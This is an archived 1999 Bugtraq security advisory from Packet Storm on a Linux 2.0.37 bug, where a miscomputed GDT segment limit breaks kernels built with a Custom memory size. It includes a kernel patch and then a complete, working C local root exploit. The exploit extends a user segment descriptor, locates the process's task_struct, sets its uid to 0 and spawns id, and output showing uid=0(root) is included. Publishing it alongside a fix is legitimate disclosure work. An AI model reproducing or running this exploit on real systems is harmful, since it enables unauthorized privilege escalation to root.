linux_segment_limit_bug.txt

1999-09-21T00:00:00
ID PACKETSTORM:15691
Type packetstorm
Reporter Packet Storm
Modified 1999-09-21T00:00:00

Description

                                        
                                            `Subject: Linux 2.0.37 segment limit bug  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
Hello,  
  
  
Linux 2.0.37 released last month introduces the support for more than  
1 GB of physical memory on x86 (which wasn't supported in earlier 2.0  
kernels). It is now possible to increase the limit, at the expense of  
reducing the per process address space.  
  
  
There're three settings supported: Standard (1 GB physical, plus 3 GB  
per process), Enterprise (2+2), and Custom (lets one enter a value).  
  
  
Unfortunately, there's a bug with filling in the lower 16 bits of the  
"segment limit" field in the corresponding GDT descriptors. Because  
of the bug, these bits are always set. As the limit is encoded in  
pages (4 KB on x86), and has to be a multiple of 4 MB because of the  
structure of page tables, the limit can be almost 252 MB off.  
  
  
It is important to note that with the Standard and Enterprise memory  
configurations, the limit is encoded correctly, as these bits should  
really be set: both 1 GB and 2 GB are multiples of 256 MB. If you're  
using one of those, you're not vulnerable.  
  
  
However, if you've chosen Custom for any reason (such as, to match  
your actual physical memory size, following one of the examples given  
in linux/Documentation/more-than-900MB-RAM.txt, or just for the extra  
diversity), then you are vulnerable.  
  
  
I've fixed this vulnerability when updating my patch for 2.0.37, and  
it's been out for two weeks now. I'm also including just the fix in  
this post. As there's probably not going to be another 2.0 kernel,  
and as I'm going to continue using 2.0 on quite a few systems for a  
few months more, I am willing to fix security holes that I might find  
or that might get reported to me, in future versions of my patch. As  
usual, the patch is available at:  
  
  
http://www.false.com/security/linux/  
  
  
Its MD5 is:  
  
  
1ec0707889c02198348f173215d1c693 secure-linux-08.tar.gz  
  
  
Just this one fix, so that you don't have to download anything or  
apply the rest of my patch:  
  
  
diff -urPX nopatch linux-2.0.37/arch/i386/config.in linux/arch/i386/config.in  
--- linux-2.0.37/arch/i386/config.in Sun Jun 13 21:20:59 1999  
+++ linux/arch/i386/config.in Tue Jun 22 08:07:33 1999  
@@ -28,7 +28,7 @@  
Custom CONFIG_MEM_SPECIAL" Standard  
  
  
if [ "$CONFIG_MEM_SPECIAL" = "y" ]; then  
- int ' Max physical memory in MB' CONFIG_MAX_MEMSIZE 1024  
+ int ' Max physical memory in MB (must be a multiple of 4)' CONFIG_MAX_MEMSIZE 1024  
fi  
if [ "$CONFIG_MEM_ENT" = "y" ]; then  
define_int CONFIG_MAX_MEMSIZE 2048  
diff -urPX nopatch linux-2.0.37/arch/i386/kernel/head.S linux/arch/i386/kernel/head.S  
--- linux-2.0.37/arch/i386/kernel/head.S Sun Jun 13 21:21:00 1999  
+++ linux/arch/i386/kernel/head.S Tue Jun 22 06:37:49 1999  
@@ -491,7 +491,7 @@  
  
  
#define lower_seg(type,dpl,base,limit) \  
(((base) & 0x0000ffff)<<16) | \  
- ((limit) & 0x0ffff)  
+ (((limit)>>12) & 0x0ffff)  
  
  
#define x86_seg(type,dpl,base,limit) \  
.long lower_seg(type,dpl,base,limit); \  
diff -urPX nopatch linux-2.0.37/include/asm-i386/pgtable.h linux/include/asm-i386/pgtable.h  
--- linux-2.0.37/include/asm-i386/pgtable.h Sun Jun 13 21:21:03 1999  
+++ linux/include/asm-i386/pgtable.h Sat Jun 26 14:49:59 1999  
@@ -210,6 +210,10 @@  
* pgd entries used up by user/kernel:  
*/  
  
  
+#if CONFIG_MAX_MEMSIZE & 3  
+#error Invalid max physical memory size requested  
+#endif  
+  
#define USER_PGD_PTRS ((unsigned long)__PAGE_OFFSET >> PGDIR_SHIFT)  
#define KERNEL_PGD_PTRS (PTRS_PER_PGD-USER_PGD_PTRS)  
#define __USER_PGD_PTRS (__PAGE_OFFSET >> PGDIR_SHIFT)  
  
  
The exploit (local root, can be extended to also reset securelevel;  
will only compile with libc 5, you'd have to rip task_struct out of  
<linux/sched.h> for compiling with glibc):  
  
  
#define __KERNEL__  
#include <linux/sched.h>  
#undef __KERNEL__  
#include <unistd.h>  
#include <grp.h>  
#include <stdio.h>  
#include <signal.h>  
#include <sys/resource.h>  
  
  
void die1()  
{  
puts("\nFailed: probably not vulnerable");  
exit(1);  
}  
  
  
void die2()  
{  
puts("\nVulnerable, but failed to exploit");  
exit(1);  
}  
  
  
int main()  
{  
int *sp = (int *)&sp;  
int *d = sp;  
struct task_struct *task = (struct task_struct *)sp;  
int pid, uid;  
struct rlimit old, new;  
  
  
setbuf(stdout, NULL);  
printf("Searching for the descriptor... ");  
  
  
signal(SIGSEGV, die1);  
  
  
while ((d[0] & 0xFFF0FFFF) != 0x00C0FB00 &&  
(d[2] & 0xFFF0FFFF) != 0x00C0F300) d++;  
  
  
signal(SIGSEGV, die2);  
  
  
printf("found at %p\nExtending its limit... ", d + 2);  
  
  
d[2] |= 0xF0000;  
  
  
printf("done\nSearching for task_struct... ");  
  
  
pid = getpid();  
uid = getuid();  
  
  
if (getrlimit(RLIMIT_FSIZE, &old)) {  
perror("getrlimit");  
return 1;  
}  
  
  
search:  
new = old; new.rlim_cur--;  
if (setrlimit(RLIMIT_FSIZE, &new))  
new.rlim_cur = old.rlim_cur;  
  
  
do {  
((int *)task)++;  
} while (task->pid != pid || task->uid != uid);  
  
  
if (task->rlim[RLIMIT_FSIZE].rlim_cur != new.rlim_cur) goto search;  
  
  
if (setrlimit(RLIMIT_FSIZE, &old)) {  
perror("setrlimit");  
return 1;  
}  
  
  
if (task->rlim[RLIMIT_FSIZE].rlim_cur != old.rlim_cur) goto search;  
  
  
printf("found at %p\nPatching the UID... ", task);  
  
  
task->uid = 0;  
setuid(0);  
setgid(0);  
setgroups(0, NULL);  
  
  
puts("done");  
  
  
execl("/usr/bin/id", "id", NULL);  
return 1;  
}  
  
  
Its output, with CONFIG_MAX_MEMSIZE=1800 (the very first example  
given in linux/Documentation/more-than-900MB-RAM.txt):  
  
  
Searching for the descriptor... found at 0x8f9068ac  
Extending its limit... done  
Searching for task_struct... found at 0x9157d810  
Patching the UID... done  
uid=0(root) gid=0(root)  
  
  
Signed,  
Solar Designer  
`